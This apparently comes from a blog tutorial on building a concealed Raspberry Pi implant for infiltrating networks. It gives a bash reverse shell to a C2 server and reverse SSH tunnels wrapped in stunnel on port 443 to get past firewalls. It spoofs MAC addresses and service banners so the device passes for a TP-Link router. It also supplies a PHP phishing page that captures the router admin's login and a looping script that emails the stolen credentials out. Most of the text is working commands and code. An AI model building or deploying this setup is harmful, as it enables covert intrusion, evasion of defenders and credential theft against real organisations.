I will show you, how I made hacking gadget from raspberry Pi, which you can infiltrate into the network over Ethernet cable or Wi-Fi adapter. The gadget can be powered over power adapter or battery, which it makes even more portable. As soon as it is connected in network, it automatically create encrypted tunnel (SSH/TLS, port 443) to the C2 server, so you can control the gadget over the shell from any part of the world. In addition, to avoid easy detection I tried to mask gadget to look like router. I changed MAC address, hidden SSH version and changed apache service name into routers one. It also includes phishing page of the real router login setting page. And its credentials are sending over email. Gadget also includes Wi-Fi access point, which gives you option to control it over phone or PC, by using ssh protocol. It is practical in case you want to infiltrate gadget over Wi-Fi, and you do not know its password till beginning of penetration testing on-site. This gadget is very suitable for red teamers.
Let’s start by explaining how I did it.
Hardware:
I am using Raspberry Pi 3 (with installed Linux Raspbian bullseye Lite), which have built in Ethernet adapter (eth0) and Wi-Fi adapter (wlan0). So any of this adapters are used to connect in attacked network. Then, I added external USB antenna, which is using for Wi-Fi access point (wlan1). To enable powering with battery, I added Lipo battery charger TP4056 and DC-DC boost step-up converter. Of course it also possible to power it over adapter. I also added power button, LED status, and button to disable Wi-Fi access point. Everything was then putted into enclosure, which was 3D designed and made by me.
Terminal stuff:
1. Connect gadget to the C2 server
I will show you three different ways to perform tunneling. Over TCP protocol, SSH protocol and SSH/SSL tunnel. TCP protocol is technical the easiest way, while SSH and SSH/SSL is a little bit harder. But do not be afraid it is not a rocket science.
Approach 1 — create tunnel with TCP protocol
This is the easiest way to create tunnel between Raspberry Pi and C2 server and consequently you can control Pi over the server.
We need only one line command on both, Raspberry Pi and C2 server.
On Raspberry Pi:
sudo bash -i >& /dev/tcp/<C2 Server IP>/5555 0>&1
On C2 server:
nc -vv -l -p 5555
I would use this approach, when I know that attacking site does not have any system admin and doesn’t put much effort to security. You need to know that TCP traffic is not encrypted so it would be easily captured and detected.
So in the further text I will show you a lit bit secured approach by using SSH protocol. Once a connection between Raspberry Pi and C2 server is established, the data transmitted between them is encrypted.
Approach 2 — create tunnel with SSH protocol
For this purpose we need to create key-based authentication, which will enable us to obtain SSH connection between Raspberry Pi and C2 server.
On the Raspberry Pi, we will use ssh-keygen, which will create public and private key:
sudo ssh-keygen -f ~/.ssh/vps -t rsa -N ""
Copy the output of public key (in this case the public key is vps.pub) and paste their content into authorized_keys in the /root/.ssh directory on the C2 server and restart the ssh service:
service ssh restart
Test ssh connection:
sudo ssh -i /home/pi/.ssh/vps root@<C2 Server IP>
So, since SSH protocol is setup correctly we can tunnel all connection from Raspberry Pi to the C2 server by running following commands:
On Raspberry Pi:
sudo ssh -i /root/.ssh/vps -nNT -R 5555:localhost:22 <C2 Server IP>
On C2 server:
ssh pi@localhost -p 5555
Ok. Now, since we went through two different tunneling approaches (TCP and SSH protocol) I will will briefly explain you, why I included and used next approach (SSH/SLL).
Lets imagine that we will attack some big company, which has also IT department with system admins with some sort of IDS, IPS and FW to do deep packet inspections, regular scanning, etc. In that kind of companies networks are usually blocking ports 22. Also if you do SSH over e.g. port 443, their systems would identify it and drop the traffic. This is the reason why I choice stunnel, so I can tunnel SSH connection that will looks like SSL traffic. I established SSL tunnel over port 443, so it will looks like normal SSL traffic and consequently FW will permit the traffic.
Approach 3 — create tunnel with SSH/SSL
First of all we need to generate private and public key on Raspberry Pi and put the public key on the C2 server, as we did in previous approach (SSH).
Set up Raspberry Pi:
Install stunnel:
apt-get install stunnel4
install autossh:
apt-get install autossh
After that, we need to create stunnel configuration /etc/stunnel/stunnel.conf file and add following:
pid = /var/run/stunnel.pid
client=yes
[ssh]
accept = 443
connect = <C2 Server IP>:443
We need to ensure that tunnel will automatically start. Add the following in /etc/default/stunnel4 file:
ENABLED=1
Then, we need to enable that Raspberry Pi will be automatically establish the SSH tunnel when network interface comes up, by creating the file /etc/network/if-up.d/autossh. Add the following:
#!/bin/bash
sudo su -c "autossh -p 443 -f -N -R *:2222:localhost:22 root@localhost -o LogLevel=error -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no" pi
And also start and enable service at startup:
sudo systemctl start stunnel4
sudo systemctl enable stunnel4
sudo systemctl daemon-reload
Setup VPS server:
Install stunnel:
apt-get install stunnel4
Open ports:
ufw enable
ufw allow 22
ufw allow 443
Due to we will tunneling SSH traffic over SSL (HTTPS) traffic, we need to generate another keys, which will be used to encrypt and decrypt the SSL traffic:
openssl genrsa 2048 > /etc/stunnel/stunnel.key
openssl req -new -key /etc/stunnel/stunnel.key -x509 -days 365 -out /etc/stunnel/stunnel.crt
cat /etc/stunnel/stunnel.crt /etc/stunnel/stunnel.key > /etc/stunnel/stunnel.pem
After that, we need to create stunnel configuration file /etc/stunnel/stunnel.conf and add following:
pid = /var/run/stunnel.pid
cert = /etc/stunnel/stunnel.pem
[ssh]
accept = 443
connect = 127.0.0.1:22
We need to ensure that tunnel will automatically start and listen the port 443. Add the following in /etc/default/stunnel4 file:
ENABLED=1
Also start and enable service at startup:
sudo systemctl start stunnel4
sudo systemctl enable stunnel4
sudo systemctl daemon-reload
For the end reboot C2 server.
That’s it. To get control over the Raspberry Pi run the following on the C2 server:
ssh -p 2222 pi@localhost
I explained you three different ways how you can control Raspberry Pi remotely over the C2 server and consequently control it from any part of the world. My recommendation is to stick to the last SSH/SSL approach in every case.
When you infiltrate in some serious network, where they have good security team and where system admins do their job on the right way, it is just a manner of time when they will detect your hacking gadget. I mean, when the system admin perform regular scan of the network, and he found new device raspberry pi. Well, I think that we can all imagine the expression on his face. So it is very smart to mask the Pi to looks like something else; like printer, router, windows pc, etc. This will definitely trigger less attention.
In my case I masked Raspberry pi to looks like and act like a router. It will looks like TP-Link router. I also created phishing page for router settings page, with the purpose to catch admins credentials, in the case if he/she found me and try to login. And I also set that harvested credentials would be sent on my email.
Firstly I spoffed MAC addresses for both adapters (eth0 and wlan1) to common TP-Link address:
sudo apt install macchanger
I created bash script (mac.sh) and putted in /etc/rc.local, so it will change mac address for each boot or reboot.
#!/bin/bash
sudo ifconfig eth0 down
sudo macchanger -m f8:d1:11:2a:24:a3 eth0
sudo ifconfig eth0 up
sudo ifconfig wlan1 down
sudo macchanger -m f8:d1:11:2a:24:a4 wlan1
sudo ifconfig wlan1 up
Changing of service name on port 22 and 80
For port 22 you should hide debian version on ssh, so it will not look suspicious in association between router and debian distro. To do this, add the following line in /etc/ssh/sshd_config
DebianBanner no
Next, change apache2 service name. Why we should change it. Well, when you perform scan on the router it is not common to see that apache service is running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.
sudo apt install apache2
sudo apt install -y php
sudo apt install -y php-{common,mysql,xml,xmlrpc,curl,gd,imagick,cli,dev,imap,mbstring,opcache,soap,zip,intl}
sudo systemctl restart apache2
sudo apt install libapache2-mod-security2
sudo a2enmod security2
In file /etc/apache2/conf-enabled/security.conf add/change following:
ServerTokens Full
SecServerSignature "TP-LINK WR841N WAP http config"
ServiceSignature Off
Creating of phishing page — router settings page
With the WebScrpBook plugin capture the page source and put it in the /var/www/html.
After that modify the index.html file. You should modify it by adding/changing action in the form part (action=”action.php”).
Create the action.php file and save it in /var/www/html.
<?php
$location='/error';
header("Location: " . "http://" . $_SERVER['HTTP_HOST'] . $location);
$handle = fopen("pass.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>
So in this code you can see that after login it will redirect you to /error folder. In this folder you can create new index.html file which will render e.g. you have no authorization to access this router. All harvested credentials will be saved in pass.txt file.
You can find the whole phishing page TP-Link router on my github page.
Setting email to receive harvested credentials
To receive harvested credentials on your email, you can use Msmtp (SMTP).
Now you need to create script and make it to run on startup, which will check every 20 sec, if pass.txt file exist, and If exist it will grep username and password from it and send to your email.
#!/bin/bash
while sleep 20
do
if [ -f /var/www/html/pass.txt ]
then grep -e user -e pass /var/www/html/pass.txt | msmtp - debug - from=default -t example@email.com
rm -f /var/www/html/pass.txt
fi
done
Create Wi-Fi access point
sudo git clone https://github.com/oblique/create_ap
cd create_ap
sudo make install
To create WI-Fi access point run the following command:
sudo create_ap -n wlan1 MyAccessPoint MyPassPhrase --no-virt
For the purpose to create AP each time at startup, I created service /etc/systemd/system/ap.service:
Unit]
Description=Run script with systemd
[Service]
ExecStart=sudo create_ap -n wlan1 MyAccessPoint MyPassPhrase --no-virt
Restart=always
TimeoutStartSec=20
RestartSec=20
[Install]
WantedBy=multi-user.target
To enable service run:
sudo systemctl enable ap.service
sudo systemctl daemon-reload